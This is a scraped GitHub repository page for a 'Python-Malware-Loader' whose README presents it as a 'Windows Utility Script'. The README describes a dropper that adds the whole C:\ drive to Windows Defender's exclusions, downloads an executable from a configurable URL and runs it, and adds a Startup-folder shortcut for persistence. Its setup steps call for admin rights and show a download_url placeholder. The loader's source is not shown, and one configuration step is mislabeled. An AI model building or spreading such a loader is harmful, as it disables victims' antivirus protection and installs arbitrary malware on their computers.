Skip to content

Fix-My-Codey/Python-Malware-Loader

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

14 Commits
 
 
 
 
 
 
 
 

Repository files navigation

https://www.virustotal.com/gui/file/7f693ef3a714489b96956b4b235d5d7d976aa3c23f90975cb48377732d3347ba?nocache=1

Windows Utility Script 🛠️

This script automates the following tasks on a Windows system:

  • Adds an antivirus exclusion for the C:\ drive in Windows Defender.
  • Downloads a specified executable file and runs it.
  • Creates a startup shortcut for the downloaded executable to ensure it runs on system startup.

Features

  • Antivirus Exclusion: Automatically adds C:\ to the Windows Defender exclusion list.
  • File Download and Execution: Downloads an .exe file from a specified URL and runs it seamlessly.
  • Startup Automation: Creates a shortcut in the Windows Startup folder, enabling the executable to run every time the system boots.

Usage Instructions 📋

Step 1: Prerequisites

Ensure you have the following:

  • download python https://www.python.org/downloads/
  • install make sure to have add file to exe path is turn on
  • Administrative privileges on the system.
  • install requirements.txt (with pip)

Step 2: Configuration

  1. Replace the download_url variable in the script with the URL of the executable you want to download:

    download_url = "http://example.com/your_executable.exe"  # Replace with your URL
  2. Replace the download_url variable in the script with the URL of the executable you want to download:

    filename = "downloaded_exe.exe"  # Name of the downloaded executable